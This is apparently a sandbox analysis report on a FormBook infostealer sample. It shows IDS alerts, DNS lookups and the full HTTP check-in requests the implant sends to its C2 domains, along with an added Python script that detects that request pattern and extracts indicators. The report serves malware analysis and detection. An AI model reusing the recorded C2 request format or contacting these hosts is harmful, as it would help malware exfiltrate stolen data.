Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:55686 -> 136.143.186.12:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:55686 -> 136.143.186.12:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55734 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55732 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:55750 -> 13.248.169.48:80
Source: DNS query: www.030002304.xyz
Source: Joe Sandbox View; IP Address: 209.74.95.29
Source: Joe Sandbox View; IP Address: 136.143.186.12
Source: Joe Sandbox View; ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: CONTABODE
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:55453
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49730
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe; Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global traffic | HTTP traffic detected:
                GET /4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.wcm50.top
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.onemart.site
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nN HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.lanxuanz.tech
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /8r0w/?X8Rx1=znhhIbB8nN&zhl=dzLnp/+gugxgWqqjxp0mT2IbFg5vFvQvzyx0DqvE635uns4HxFL1cM/nxlijH3CXr4Dn+r6a2xCcjbq3+Q1mOYlqiQ0t9purOwXAnxy8DKlJc7DWVLNExsI= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.komart.shop
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /szao/?zhl=xOsStlDAPOZpiXvsnmuwA88PT6OXK0eKU2uFkXlZ1FsWMYGKmmEGy9m/gq1jsAT5roDCFnYyY1aFVaz80OwxPCjqIvTp6x+JqjH2NXebd4izNju9X+dPpzI=&X8Rx1=znhhIbB8nN HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.teerra.shop
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.dverkom.store
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nN HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.dalong.site
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.030002304.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | HTTP traffic detected:
                GET /9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.polarmuseum.info
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic | DNS traffic detected: DNS query: www.wcm50.top
            Source: global traffic | DNS traffic detected: DNS query: www.everycreation.shop
            Source: global traffic | DNS traffic detected: DNS query: www.onemart.site
            Source: global traffic | DNS traffic detected: DNS query: www.lanxuanz.tech
            Source: global traffic | DNS traffic detected: DNS query: www.komart.shop
            Source: global traffic | DNS traffic detected: DNS query: www.teerra.shop
            Source: global traffic | DNS traffic detected: DNS query: www.dverkom.store
            Source: global traffic | DNS traffic detected: DNS query: www.dalong.site
            Source: global traffic | DNS traffic detected: DNS query: www.030002304.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.polarmuseum.info
            Source: global traffic | DNS traffic detected: DNS query: www.growdigitally.net
            Source: unknown | HTTP traffic detected:
                POST /frpa/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate
                Host: www.onemart.site
                Origin: http://www.onemart.site
                Connection: close
                Content-Length: 200
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.onemart.site/frpa/
                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 64 6b 57 6e 49 46 35 6b 61 48 70 5a 4d 50 71 79 4f 36 52 37 55 4b 46 53 4d 37 2f 64 47 2f 6b 6f 42 6d 69 70 4f 55 52 64 61 36 66 54 6e 39 6d 51 7a 4f 44 2f 54 62 55 38 38 79 70 58 76 38 55 6b 50 6c 54 5a 66 35 2b 44 59 76 6b 39 6c 39 50 43 6e 64 66 41 52 57 39 58 33 38 75 37 4b 79 79 4e 74 69 69 73 64 47 7a 64 4c 46 75 70 2b 74 73 66 56 70 78 47 67 4c 62 6f 64 51 54 42 41 41 30 2f 4a 44 2f 49 30 6b 34 4d 61 61 64 56 56 57 71 58 64 71 6d 4e 32 51 75 78 45 4a 39 4f 30 35 34 53 50 70 32 77 31 4f 78 54 74 4e 4a 41 65 51 64 2b 2f 71 66 58 74 67 3d 3d
                Data Ascii: zhl=76ifAss/opDqdkWnIF5kaHpZMPqyO6R7UKFSM7/dG/koBmipOURda6fTn9mQzOD/TbU88ypXv8UkPlTZf5+DYvk9l9PCndfARW9X38u7KyyNtiisdGzdLFup+tsfVpxGgLbodQTBAA0/JD/I0k4MaadVVWqXdqmN2QuxEJ9O054SPp2w1OxTtNJAeQd+/qfXtg==
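Every GET above has the same shape: a four-character directory, one short alphanumeric parameter that never changes (X8Rx1=znhhIbB8nN, the per-infection identifier), one long base64-like blob that does, and the same Android User-Agent; the POST to www.onemart.site carries the same kind of blob as form data. FormBook is documented to cycle through a list of domains of which most are decoys, so every host in that list is worth recording as an IOC even though all of them answered 404 in this run. The script below is an added example, not code from this report or from FormBook: it encodes that shape as rules and runs them over a request list constructed from the lines above (request target, Host and body only; the POST body is decoded from the report's Data Raw hex rather than retyped). The thresholds in the regexes are this example's own reading of the traffic, not a published signature.

```python
"""Recognise the check-in shape of the HTTP requests above and pull network IOCs from them.

Added example, not code from this report or from FormBook. REQUESTS is constructed from
the report's GET/POST lines (request target, Host and body only); the shape rules
(four-character directory, one short alphanumeric ID plus one long base64-like blob)
are this example's own reading of those lines, not a published signature.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# The POST body exactly as the report's 'Data Raw' hex (Content-Length: 200); decoded, not retyped.
POST_BODY_HEX = (
    "7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 64 6b 57 6e 49 46 35 6b 61 48 70 5a "
    "4d 50 71 79 4f 36 52 37 55 4b 46 53 4d 37 2f 64 47 2f 6b 6f 42 6d 69 70 4f 55 52 64 "
    "61 36 66 54 6e 39 6d 51 7a 4f 44 2f 54 62 55 38 38 79 70 58 76 38 55 6b 50 6c 54 5a "
    "66 35 2b 44 59 76 6b 39 6c 39 50 43 6e 64 66 41 52 57 39 58 33 38 75 37 4b 79 79 4e "
    "74 69 69 73 64 47 7a 64 4c 46 75 70 2b 74 73 66 56 70 78 47 67 4c 62 6f 64 51 54 42 "
    "41 41 30 2f 4a 44 2f 49 30 6b 34 4d 61 61 64 56 56 57 71 58 64 71 6d 4e 32 51 75 78 "
    "45 4a 39 4f 30 35 34 53 50 70 32 77 31 4f 78 54 74 4e 4a 41 65 51 64 2b 2f 71 66 58 "
    "74 67 3d 3d"
)

# (method, request target, Host, body) in the order the report lists them.
REQUESTS = [
    ("GET", "/4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN", "www.wcm50.top", b""),
    ("GET", "/frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E=", "www.onemart.site", b""),
    ("GET", "/tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nN", "www.lanxuanz.tech", b""),
    ("GET", "/8r0w/?X8Rx1=znhhIbB8nN&zhl=dzLnp/+gugxgWqqjxp0mT2IbFg5vFvQvzyx0DqvE635uns4HxFL1cM/nxlijH3CXr4Dn+r6a2xCcjbq3+Q1mOYlqiQ0t9purOwXAnxy8DKlJc7DWVLNExsI=", "www.komart.shop", b""),
    ("GET", "/szao/?zhl=xOsStlDAPOZpiXvsnmuwA88PT6OXK0eKU2uFkXlZ1FsWMYGKmmEGy9m/gq1jsAT5roDCFnYyY1aFVaz80OwxPCjqIvTp6x+JqjH2NXebd4izNju9X+dPpzI=&X8Rx1=znhhIbB8nN", "www.teerra.shop", b""),
    ("GET", "/p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw=", "www.dverkom.store", b""),
    ("GET", "/s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nN", "www.dalong.site", b""),
    ("GET", "/jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U=", "www.030002304.xyz", b""),
    ("GET", "/9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN", "www.polarmuseum.info", b""),
    ("POST", "/frpa/", "www.onemart.site", bytes.fromhex(POST_BODY_HEX)),
]
# Constructed benign request (not from the report) to show the rules reject ordinary traffic.
NOISE = [("GET", "/search?q=formbook&page=2", "www.example.com", b"")]

DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")              # /4snq/, /frpa/, ...
ID_RE = re.compile(r"^[A-Za-z0-9]{8,12}$")           # znhhIbB8nN, identical on every GET
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long base64-like encrypted payload


def split_form(raw: str) -> dict:
    """Split k=v&k=v on '&' and the first '=' only, with no percent/plus decoding,
    so the '+' and '/' characters inside the blob survive exactly as sent."""
    fields = {}
    for part in raw.split("&"):
        if part:
            key, _, value = part.partition("=")
            fields[key] = value
    return fields


def parse_checkin(method: str, target: str, host: str, body: bytes = b""):
    """Return a record if the request has the check-in shape, otherwise None."""
    url = urlsplit(target)
    if not DIR_RE.match(url.path):
        return None
    raw = url.query if method == "GET" else body.decode("ascii", "replace")
    fields = split_form(raw)
    ids = [v for v in fields.values() if ID_RE.match(v)]
    blobs = [v for v in fields.values() if BLOB_RE.match(v)]
    if method == "GET" and not (len(fields) == 2 and len(ids) == 1 and len(blobs) == 1):
        return None
    if method == "POST" and len(blobs) != 1:
        return None
    return {"method": method, "host": host, "dir": url.path,
            "client_id": ids[0] if ids else None, "blob_len": len(blobs[0])}


def extract_iocs(requests):
    """Hosts contacted with the check-in shape (first-seen order), the IDs seen, and all hits."""
    hits = [rec for rec in (parse_checkin(*req) for req in requests) if rec]
    hosts = list(dict.fromkeys(rec["host"] for rec in hits))
    client_ids = Counter(rec["client_id"] for rec in hits if rec["client_id"])
    return {"hosts": hosts, "client_ids": client_ids, "hits": hits}


if __name__ == "__main__":
    result = extract_iocs(REQUESTS + NOISE)
    print("check-in hosts:", ", ".join(result["hosts"]))
    print("client id(s):", dict(result["client_ids"]))
    for rec in result["hits"]:
        print(f'{rec["method"]:4} {rec["host"]:22} {rec["dir"]}  blob={rec["blob_len"]} chars')
```

The query string is split by hand rather than with urllib.parse.parse_qs, because parse_qs would turn the '+' inside the blob into a space and the value would no longer be the bytes the implant sent. The constant identifier is the field to pivot on when hunting for other infections of the same build in proxy logs; the directory names and blobs change per request and per host.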
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 05 Nov 2024 14:22:56 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66a62026-94"
                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:20 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 
30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:22 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 
30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65
